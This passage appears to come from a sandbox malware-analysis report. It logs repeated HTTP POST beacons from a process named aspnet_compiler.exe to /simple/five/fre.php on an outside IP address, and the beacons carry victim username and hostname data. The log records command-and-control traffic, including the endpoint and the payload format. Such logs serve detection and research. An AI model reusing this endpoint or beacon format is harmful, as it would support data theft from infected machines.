Nov 15, 2024 18:15:06.033854961 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49808	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:06.194040060 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:06.199202061 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:07.183650017 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49813	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:07.364787102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:07.370279074 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:08.327786922 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49818	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:08.474978924 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:08.480132103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:09.442281008 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49825	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:09.754107952 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:09.759212971 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:10.714437962 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49832	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:10.864219904 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:10.869167089 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:11.828722000 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49836	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:11.997169971 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:12.002434015 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:12.948380947 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49841	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:13.099525928 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:13.104631901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:14.079732895 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49849	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:14.231035948 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:14.236002922 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:15.183604956 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49855	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:15.343772888 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:15.349390984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:16.283584118 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49860	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:16.428797960 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:16.433712959 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:17.363177061 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49865	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:17.533133030 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:17.538065910 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:18.468389988 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49869	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:18.628218889 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:18.633126020 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:19.607048988 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49875	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:19.760445118 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:19.765315056 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:20.770309925 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49879	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:20.933852911 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:20.938966990 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:21.913968086 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49884	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:22.070224047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:22.075165033 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:23.029581070 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49888	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:23.178268909 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:23.183307886 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:24.542594910 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49895	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:24.801156044 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:24.806145906 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:25.761615992 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49900	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:26.045871019 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:26.050868034 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:27.028803110 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49905	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:27.202425957 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:27.207350969 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:28.160433054 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49911	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:28.323595047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:28.328660965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:29.272986889 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49918	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
